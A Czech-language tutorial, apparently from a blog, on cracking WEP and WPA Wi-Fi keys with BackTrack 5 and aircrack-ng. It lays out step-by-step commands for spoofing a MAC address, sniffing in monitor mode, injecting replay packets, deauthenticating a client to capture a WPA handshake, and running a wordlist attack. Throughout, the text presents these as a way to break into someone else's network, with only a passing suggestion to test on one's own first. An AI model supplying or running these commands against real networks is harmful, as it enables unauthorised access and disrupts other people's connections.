Dnes se podíváme,  jak je to s hackováním wifi sítí. Bezdrátové sítě mají různá šifrování (WEP, WPA a WPA2), tento návod by měl fungovat pouze na dešifrování klíče WEP (64-bit, 128-bit a 256-bit, neboli 10 znaků, 26 znaků a 58 znaků) a WPA. K hackování použijeme distribuci linuxu BackTrack 5. (Ke stažení zde ) Kdo ji nechce instalovat, nemusí, stačí ji stáhnout, vypálit a pak spustit. Doporučuji stáhnout verzi s GNOME a použít program LILI, který vám vytvoří bootovací USB flash disk. Pro přihlášení pak použijte údaje: ,,user: root, heslo: toor“.

Po instalaci, či bootování se ujistěte, že systém nalezl vaše ovladače pro bezdrátovou kartu, příkazem ,,ifconfig”. Měla by se zobrazit jako ,,rausb, wlan, wlan0 apod.” Pokud ne, budete si buď muset pořídit novou WIFI Kartu (Při výběru doporučuji se porozhlédnout na internetu, které karty k danému účelu slouží nejlépe. Často to bývají karty s chipsety Atheros a Ralink, nejlépe od firmy Linksys), nebo se kouknout na internetu jak se instalují ovladače pod linuxem. Pozor, ne všechny bezdrátové karty podporují odposlouchávací ,,monitor mode”!

  • Pokud budete chtít zapnout grafické prostředí (doporučuji), použijte příkaz ,,startx” .

Užitečné příkazy pro práci s linuxovým terminálem

          • ifconfig   (interface)    up = zapne  síťový prvek (kartu, ethernet)
          • ifconfig    (interface)   down =  vypne síťový prvek (kartu, ethernet)
          • cp   ,,cesta ke kopírovanému souboru”     ,,kam”
          • cd ,,Jméno, či cesta ke složce = dostanete se do určené složky”
          • cd .. = vrátíte se o složku zpět
          • rm ,,cesta k odstraňovanému souboru”
          • mv ,,cesta k přesunovanému, či přejmenovávanému souboru ”    ,,kam”
          • ps -A = zobrazí všechny běžící procesy
          • kill ,,ID procesu” = vypne běžící proces
          • passwd  = změna hesla přihlášeného uživatele
          • reboot = restartuje pc
          • shutdown now = vypne PC
          • chmod 777 ,,Cesta k souboru” = přidá k nějakému souboru oprávnění pro zápis a čtení pro všechny uživatele
          • apt-get install aircrack-ng = nainstaluje hackovací software pro linux, používá se v kombinaci se sudo (Aircrack je už integrovaný v distribuci BackTrack)

Začínáme

 Vypněte vaši síťovou kartu (budu používat mé značení ,,wlan0″).

ifconfig wlan0 down

Teď si dle libosti můžete změnit MAC adresu vaší síťové karty ( Kde ,,00:11:22:33:44:55″ je mnou zvolená mac adresa) za tím musí následovat jméno vaší karty (wlan0).  Tento krok můžete přeskočit, pokud síť, do které se chcete nabourat nemá nastavené MAC-Filtering. (Připojit se mohou jen klienti s určitou MAC-Adresou)

macchanger –mac 00:11:22:33:44:55 wlan0

Nyní zapneme monitorovací režim vaší karty, takže vaše karta bude schopná odposlouchávat všechna data, posílaná po všech sítích z okolí. Pokud se zobrazí hláška, že nějaký proces blokuje akci,nebo že by mohl blokovat, zabte ho příkazem ,,kill 1234″ kde 1234 je ID procesu (Co je to za proces můžete pomocí ,,ps -A”). 

airmon-ng start wlan0

Teď můžete opět vaši síťovou kartu zapnout následujícím příkazem:

ifconfig wlan0 up

Následně se pokusíme zjistit nějaké informace o síti, do které se chcete nabourat, spusťte příkaz:

airodump-ng mon0

Chvilku počkejte, pak zmáčknětě ,,ctrl + c” a zapište si BSSID, kanál a ESSID dotyčné sítě. V mém případě BSSID: ,,2B:4F:77:Z5:1S:NN”, Kanál:  ,,6″, ESSID:  ,,www.nvidia.co.uk”. Doporučuji zapisovat do Kate (Pokud máte prostředí KDE), Gedit(Pokud máte prostředí GNOME), nebo do čehokoliv jiného, kam lze zapisovat a pak z toho kopírovat. Pak se kouknětě v jakém jste adresáři (obvykle root, home) a zadejte:

airodump-ng -c 6 -w nvidia –bssid 2b:4f:77:z5:1s:nn mon0 (Shodné stále pro WEP i WPA)

WEP Exploitation

Kde ,,-w nvidia” znamená zapisovat do souboru se jménem nvidia. Označení souboru je na vás. Tímto jste začali shromažďovat všechny packety ze sítě, které budete potřebovat k nabourání se do ní. Ke cracknutí se doporučuje mít alespoň 10 000 packetů. Nyní můžete buď čekat, až vám takové číslo samo naroste aktuálním síťovým provozem, nebo se pokusit generovat packety následujícím způsobem: Otevřte si nové terminálové okno a zadejte:

aireplay-ng -1 0 -a 2B:4F:77:Z5:1S:NN  -h 00:11:22:33:44:55 -e www.nvidia.co.uk mon0

Kde -a = MAC Routeru, -h = MAC vaší karty a  -e = název sítě. Tímto se karta jen autentizuje u přístupového bodu. Ke generaci budete potřebovat příkaz:

aireplay-ng -3 -b 2B:4F:77:Z5:1S:NN -h 00:11:22:33:44:55 mon0

Tímto se začnou z vašeho počítače odesílat packety, na které bude přístupový bod odpovídat a tvořit tak provoz na síti. Obvykle je to asi 300-800 packetů/s. Nyní budete mít čas dát si čokoládu. Až jí sníte, přejdětě k následujícímu konečnému příkazu (opět v novém okně terminálu):

aircrack-ng -b 2b:4f:77:z5:1s:nn  nvidia-01.cap

Tento příkaz jde ovšem ještě zkrátit jen na ,,aircrack-ng nvidia-01.cap” (při této volbě vybere program BSSID sám). Zjištění klíče obvykle netrvá dlouho, ale závisí na délce klíče. Pokud program klíč nezjistí, bude se o to pravidelně pokoušet po novém navýšení packetů (IVS) o hodnotu 5000 …. až se vám nakonec objeví hláška: KEY FOUND! ….. zobrazí se buď v HEX: ,,ab:cd:ef:gh:ij”, nebo přímo v ASCII:  ,,heslo” . Pro přihlášení do sítě použijte tento klíč, nebo HEX bez dvojteček.

WPA Exploitation

Kde ,,-w nvidia” znamená zapisovat do souboru se jménem nvidia. Označení souboru je na vás. Tímto jste začali shromažďovat všechny packety ze sítě. Ke cracknutí budeme využijeme metodu ,,Handshake”. Budeme potřebovat jeden packet, obsahující ,,handshake”. Můžeme buď opět čekat, dokud se nepřipojí klient a airodump-ng neuloží daný packet, nebo budeme nejprve potřebovat zjistit MAC jednoho z připojených klientů. Za tímto úkolem se koukněte do terminálového okna, kde běží airodump-ng a zkopírujte si libovolnou MAC adresu připojeného klienta ze sloupečku ,,Stations”. (Např: ,,00:0F:B5:FD:FB:C2″)  Otevřte si nové terminálové okno a zadejte:

aireplay-ng -0 1 -a 2B:4F:77:Z5:1S:NN  -c 00:0F:B5:FD:FB:C2 mon0

Tímto jsme daného klienta deauthentizovali. Nyní můžeme tedy doufat, že po síti pošle nový handshake. Airodump-ng by to měl ukázat vpravo nahoře. Pokud jsme handshake získali,pokusíme se zjistit klíč:

aircrack-ng -w password.lst -b 2B:4F:77:Z5:1S:NN nvidia-01.cap

Zde je ovšem problém. Ke zjistění klíče potřebujete velmi rozsáhlou databázi klíčů. (-w password.lst) Aircrack-ng má integrovanou knihovnu klíčů, kterou si musíte najít a zkopírovat do adresáře, ve kterém pracujete. Je to knihovna těch nejpoužívanějších klíčů,nicméně je velká pravděpodobnost, že tam hledaný klíč nebude. Doporučuji použít nejdříve tu od aircrack-ng, pak případně names.txt, wpa.txt, passwords.txt a nakonec other.txt.

Uvedené knihovny jsou opravdu rozsáhlé a může trvat pěknou chvilku, než klíč najdete pokud se vám to skutečně podaří.

screenshot-1

Picture 1 of 4

  • Uvedený postup doporučujivyzkoušet nejprve na vlastní síti, kde si krásně můžete nagenerovat provoz např. přeposíláním souborů nebo sledováním HD videa
  • Pokud jste něco nepochopili, můžete zde dole zanechat komentář, nebo se kouknout na adresu  lifehacker.com
  • Další užitečné rady a návody hledejte na webu www.aircrack-ng.org